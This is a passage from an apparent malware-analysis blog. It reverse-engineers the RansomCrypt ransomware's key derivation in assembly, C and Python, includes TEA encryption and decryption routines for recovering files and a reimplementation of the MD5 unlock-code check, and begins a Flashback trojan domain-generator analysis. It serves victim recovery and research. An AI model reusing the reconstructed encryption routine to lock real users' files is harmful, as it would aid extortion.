<span class="Apple-style-span" style="font-size: x-small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dl, [eax] ; get first </span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">char</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> from filename</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov ecx, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">10</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">h</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov esi, offset BaseKey</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov edi, offset GeneratedKey</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 13.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> KeyGeneration:</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> lodsb</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> xor al, dl</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> rol dl, </span></span><span style="color: #2832cf;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">1</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> stosb</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> loop KeyGeneration</span></span></div>
</div>
</div>
<div>
<span class="Apple-style-span" style="color: #274e13;"><br /></span></div>
<div>
<div>
<br />
Or in C, if you prefer:<br />
<br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> #define ROTATE_LEFT(a,n) ( ((a) << (n)) | ((a) >> (8 - (n))) ) /* 8-bit rotate, like rol dl, 1 */</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 13.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> unsigned char StaticKey[16]; /* the byte-swapped resource key (BaseKey in the assembly) */</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> unsigned char GeneratedKey[16], A; /* A must be a byte for the 8-bit rotate to match */</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> int i;</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> A = Filename[0]; /* first character of the target filename (mov dl, [eax]) */</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> for (i = 0; i < 16; i++)</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">     GeneratedKey[i] = StaticKey[i] ^ A; /* lodsb / xor al, dl / stosb */</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">     A = ROTATE_LEFT(A, 1); /* rol dl, 1 */</span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> }</span></span></div>
<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Finally I noticed that the malware doesn't encrypt the entire file, but it skips the first </span><span class="Apple-style-span" style="color: #274e13;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">0x47</span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> bytes. I believe that this is done because the first bytes of a file usually contain a header (depending on the type of the file), and these headers may contain predictable data that may allow </span><a href="http://en.wikipedia.org/wiki/Known-plaintext_attack"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">known plaintext attacks</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We have gone through the encryption: they key is generated starting from a static seed, and then TEA is used, so if you have been infected you can generate your decryption keys and get your files back.</span></div>
</div>
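<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">As an added example (my own code, not the malware's routines or F-Secure's script), here is the key derivation described above ported to Python, together with a TEA implementation applied after the skipped header, so that the recovery path can be tried on a constructed file. The resource key and the 0x47 offset are the values from this post; standard 32-round TEA, ECB mode, little-endian words and an untouched trailing partial block are my assumptions.</span><br />
</div>

```python
# Added example, not the malware's code: RansomCrypt key derivation as described in
# the post (dword byte swap, then XOR with a rotating copy of filename[0]) plus TEA.
import struct

DELTA = 0x9E3779B9          # the TEA magic constant the post mentions
MASK = 0xFFFFFFFF
ROUNDS = 32                 # ASSUMPTION: the standard TEA round count
HEADER_SKIP = 0x47          # leading bytes the malware leaves in clear

# 16-byte key from the resource section (value taken from the post).
RESOURCE_KEY = bytes.fromhex("4A2E94466064855B5A86898C7F636C50")


def swap_dword_endianness(key):
    """Reverse the byte order of each dword, as the malware does before using the key."""
    return b"".join(key[i:i + 4][::-1] for i in range(0, len(key), 4))


def rol8(value, n):
    """8-bit rotate left, the 'rol dl, 1' of the KeyGeneration loop."""
    return ((value << n) | (value >> (8 - n))) & 0xFF


def derive_file_key(resource_key, filename):
    """Port of the KeyGeneration loop: every key byte is XORed with a rotating copy
    of the first byte of the filename (mov dl, [eax]; xor al, dl; rol dl, 1)."""
    a = ord(filename[0]) & 0xFF
    out = bytearray()
    for key_byte in swap_dword_endianness(resource_key):
        out.append(key_byte ^ a)
        a = rol8(a, 1)
    return bytes(out)


def tea_encrypt_block(v0, v1, k):
    total = 0
    for _ in range(ROUNDS):
        total = (total + DELTA) & MASK
        v0 = (v0 + (((v1 << 4) + k[0]) ^ (v1 + total) ^ ((v1 >> 5) + k[1]))) & MASK
        v1 = (v1 + (((v0 << 4) + k[2]) ^ (v0 + total) ^ ((v0 >> 5) + k[3]))) & MASK
    return v0, v1


def tea_decrypt_block(v0, v1, k):
    total = (DELTA * ROUNDS) & MASK
    for _ in range(ROUNDS):
        v1 = (v1 - (((v0 << 4) + k[2]) ^ (v0 + total) ^ ((v0 >> 5) + k[3]))) & MASK
        v0 = (v0 - (((v1 << 4) + k[0]) ^ (v1 + total) ^ ((v1 >> 5) + k[1]))) & MASK
        total = (total - DELTA) & MASK
    return v0, v1


def _tea_file(data, key, block_fn):
    """Apply TEA block by block after the skipped header. ASSUMPTIONS: ECB mode,
    little-endian 32-bit words, and a trailing partial block left as it is."""
    k = struct.unpack("<4I", key)
    header, body = data[:HEADER_SKIP], data[HEADER_SKIP:]
    out = bytearray(header)
    full = len(body) - len(body) % 8
    for off in range(0, full, 8):
        v0, v1 = struct.unpack("<2I", body[off:off + 8])
        out += struct.pack("<2I", *block_fn(v0, v1, k))
    out += body[full:]
    return bytes(out)


def encrypt_file_bytes(data, filename, resource_key=RESOURCE_KEY):
    return _tea_file(data, derive_file_key(resource_key, filename), tea_encrypt_block)


def decrypt_file_bytes(data, filename, resource_key=RESOURCE_KEY):
    """Recover a file: the name must be the one it had when it was encrypted."""
    return _tea_file(data, derive_file_key(resource_key, filename), tea_decrypt_block)


if __name__ == "__main__":
    original = b"%PDF-1.4 constructed sample file " + bytes(range(256))  # constructed input
    encrypted = encrypt_file_bytes(original, "report.pdf")
    assert encrypted[:HEADER_SKIP] == original[:HEADER_SKIP]     # header left in clear
    assert decrypt_file_bytes(encrypted, "report.pdf") == original
    # A renamed file derives a different key, which is why renaming breaks decryption.
    assert decrypt_file_bytes(encrypted, "Report.pdf") != original
    print("key for report.pdf:", derive_file_key(RESOURCE_KEY, "report.pdf").hex())
```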
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">You can use the python script from F-Secure, which performs the decryption automatically. However, users should note that they should NOT rename the encrypted files: the encryption key is generated combining the static key with the first character of the filename, so changing the filename of an encrypted file may cause incorrect decryption.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Alternatively, the malware prompts the user for a code that if inserted will cause the malware to decrypt all encrypted files and then remove itself. The code will be sent of course only after a user sends money to the malware author.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht31FNlQZhyRKYGuBH4bko7nB4o2QUxEIBB3ZMJ1cbI8Bvwg9-uEVT-5upH9BWFyPh4zVb9fuTLsi6bn5h_Cy_I2EGj1MqgqqiqD1YUOWwKTnc7OdC3NHit2O1-HoCpdFMh-yto_Z6gcw/s1600/shot3.bmp" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht31FNlQZhyRKYGuBH4bko7nB4o2QUxEIBB3ZMJ1cbI8Bvwg9-uEVT-5upH9BWFyPh4zVb9fuTLsi6bn5h_Cy_I2EGj1MqgqqiqD1YUOWwKTnc7OdC3NHit2O1-HoCpdFMh-yto_Z6gcw/s1600/shot3.bmp" /></a></div>
<br />
<br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Can't we just get this code? Does it really work? I tried forcing the tool to accept any code (I cracked it, if you want to put it that way), and the malware did decrypt the files and remove itself. So having the code may solve the problem immediately.</span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">Unfortunately, the code is checked pretty heavily: the string you enter is hashed five times with MD5 (the hashing is done through the Windows Crypto APIs) and then compared with a hash that is hardcoded in the configuration; something like this:</span><br />
<br />
<br />
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> if</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> MD5( MD5( MD5(MD5(MD5(Code))))) == </span></span><span class="Apple-style-span" style="color: blue;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">900140074FA550671FB6916CFF4D21CC</span></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px; min-height: 13.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></span></div>
<div style="font: 11.0px Menlo; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="color: #bf2e9d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">then</span></span></span><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> DecryptAndRemove()</span></span></div>
</div>
</div>
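The unlock-code check described above, reimplemented as an added example (this is neither the malware's code nor the author's): MD5 is applied five times and the result is compared with the hash hardcoded in the configuration. The post does not say whether each round re-hashes the raw 16-byte digest or its hex rendering, so the <code>rehash_hex</code> flag, the lowercase hex rendering and the UTF-8 encoding of the typed code are assumptions an analyst would confirm in the disassembly.

```python
import hashlib
import hmac

# Hash quoted from the pseudocode above: the value the malware compares against.
CONFIG_HASH = "900140074FA550671FB6916CFF4D21CC"
ROUNDS = 5


def chain_md5(code: str, rehash_hex: bool = False, rounds: int = ROUNDS) -> str:
    """Apply MD5 `rounds` times to `code`; return the final digest as uppercase hex.

    rehash_hex=False feeds the raw 16-byte digest of one round into the next
    (a CryptHashData loop over the previous CryptGetHashParam output).
    rehash_hex=True feeds the 32-character lowercase hex string instead.
    Which variant the sample uses is an assumption; the two diverge from the
    second round on, so the convention must be checked before any hash
    computed here is trusted.
    """
    data = code.encode("utf-8")  # encoding of the typed code: assumption
    digest = b""
    for _ in range(rounds):
        digest = hashlib.md5(data).digest()
        data = digest.hex().encode("ascii") if rehash_hex else digest
    return digest.hex().upper()


def verify_unlock_code(code: str, expected_hex: str = CONFIG_HASH,
                       rehash_hex: bool = False) -> bool:
    """The malware's decision: True is the branch that runs DecryptAndRemove()."""
    return hmac.compare_digest(chain_md5(code, rehash_hex), expected_hex.upper())


if __name__ == "__main__":
    sample = "constructed-sample-code"  # constructed input, not a real unlock code
    print("raw-digest chain :", chain_md5(sample))
    print("hex-string chain :", chain_md5(sample, rehash_hex=True))
    print("accepted?        :", verify_unlock_code(sample))
```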
<div>
<span class="Apple-style-span" style="font-family: 'Helvetica Neue', Arial, Helvetica, sans-serif;"><br /></span><br />
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">So, unless you have the time and patience to crack this chain of MD5 hashes, you are better off calculating your own keys and decrypting the files yourself.</span></div>
<div>
<br /></div>giuliahttp://www.blogger.com/profile/12995367052667481710noreply@blogger.com0tag:blogger.com,1999:blog-8573685359056491736.post-44098269671234261032012-04-12T12:56:00.000-07:002012-05-06T02:39:25.551-07:00Flashback Trojan: domain generator algorithm demystified<span class="Apple-style-span" style="font-family: Verdana, sans-serif;">We have already heard a lot about Flashback, a trojan targeting users of Apple's Mac OS X that has so far infected more than 600,000 machines around the world by exploiting a Java vulnerability</span><span style="color: #484848;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"> (</span><a href="http://blogs.technet.com/b/mmpc/archive/2012/03/20/an-interesting-case-of-jre-sandbox-breach-cve-2012-0507.aspx"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">CVE-2012-0507</span></a><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">).</span></span><br />
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span style="color: #38761d;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"> </span></span></span><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">
</span></span><br />
<span style="color: #484848; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Kaspersky has conducted a good analysis: </span></span></span></span><br />
<span style="color: #484848; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="color: black;"></span></span></span></span><span class="Apple-style-span" style="color: #484848;"><a href="https://www.securelist.com/en/blog/208193441/Flashfake_Mac_OS_X_botnet_confirmed"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">https://www.securelist.com/en/blog/208193441/Flashfake_Mac_OS_X_botnet_confirmed</span></span></a></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;"><br /></span></span></div>
<div style="font: 12.0px Helvetica; margin: 0.0px 0.0px 0.0px 0.0px;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">Information from the user's perspective has already been published: removal scripts, patches, detection routines and so on are easy to find all over the net. However, the most interesting part of this malware, from a security standpoint, is its spreading functionality.</span></span></div>
<div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="font-family: Verdana, sans-serif;"><span class="Apple-style-span" style="font-size: small;">I recently got a sample of this malware and analyzed part of its code. Identifying the domain generation algorithm was easy once I noticed the piece of code that builds the URL:</span></span></div>
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span style="color: #38761d;"> </span>
</div>
<span style="color: #38761d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> <span class="Apple-style-span" style="color: black;">mov edi, [ebp+StrParam1]</span></span></span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [esp+<span class="Apple-style-span" style="color: blue;">10</span>h], eax ; </span><span class="Apple-style-span" style="color: #bf2e9d; font-family: 'Courier New', Courier, monospace;">string</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> param2 </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dword ptr [esp+<span class="Apple-style-span" style="color: blue;">8</span>], offset aSS ; </span><span class="Apple-style-span" style="color: #bf2e9d; font-family: 'Courier New', Courier, monospace;">char</span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> format </span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov dword ptr [esp+<span class="Apple-style-span" style="color: blue;">4</span>], 200h ; size_t</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [esp+<span class="Apple-style-span" style="color: blue;">0C</span>h], edi ; </span><span class="Apple-style-span" style="color: #bf2e9d; font-family: 'Courier New', Courier, monospace;">string </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">param1</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> mov [esp], ebx ; dest</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> call snprintf</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">
</span><br />
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> aSS db '%s%s',<span class="Apple-style-span" style="color: blue;">0</span></span><br />
<span style="color: #38761d; font-family: Helvetica; font-size: 12px;"> </span><br />
<div style="font-family: Helvetica; font-size: 12px; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">The domain generator algorithm is immediately before this part.</span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: Verdana, sans-serif;">I studied it for a while and rewrote it in C:</span></span><br />
<br />
<span style="color: #783f04;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> #include</span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><stdio.h></span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><br />
<span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #783f04;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#include</span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><stdlib.h></span></span></span><br />
<span class="Apple-style-span" style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #783f04;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">#include</span></span></span><span style="color: #38761d;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span style="color: #cc0000;"><span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><string.h></span></span></span><br />
<span class="Apple-style-span" style="font-size: small;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"></span></span><span class="Apple-style-span" style="font-size: small;"><span style="color: #783f04;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="color: #cc0000;"> </span>#include</span></span></span><span class="Apple-style-span" style="font-family: Helvetica;"><span style="color: #38761d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span></span><span class="Apple-style-span" style="font-family: Helvetica;"><span style="color: #cc0000;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><span class="Apple-style-span" style="font-size: small;"><time.h></span></span></span></span></div>
</div>
<span class="Apple-style-span" style="font-family: Helvetica;"></span><br />
<span class="Apple-style-span" style="font-family: Helvetica;"><div style="margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px; min-height: 13px;">
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></div>
</div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span style="color: #bf2e9d;"><span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">GenDomain(</span></span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">void</span></span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">)</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> {</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">struct</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">tm *ptm;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> time_t rawtime;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br /></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
</div>
<div style="color: #484848; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unsigned</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> day, month, year;</span></span></div>
<span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"><br />
</span><div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unsigned</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">day1, day2, day3, month1, year1, year2, year3;</span></span></div>
<div style="color: #008e2a; font-style: normal; font-variant: normal; font-weight: normal; line-height: normal; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; margin-top: 0px;">
<span class="Apple-style-span" style="color: #008326;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">unsigned</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span style="color: #bf2e9d;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">int</span></span><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;"> </span><span class="Apple-style-span" style="color: black;"><span class="Apple-style-span" style="font-family: 'Courier New', Courier, monospace;">i, j, size;</span></span></div>
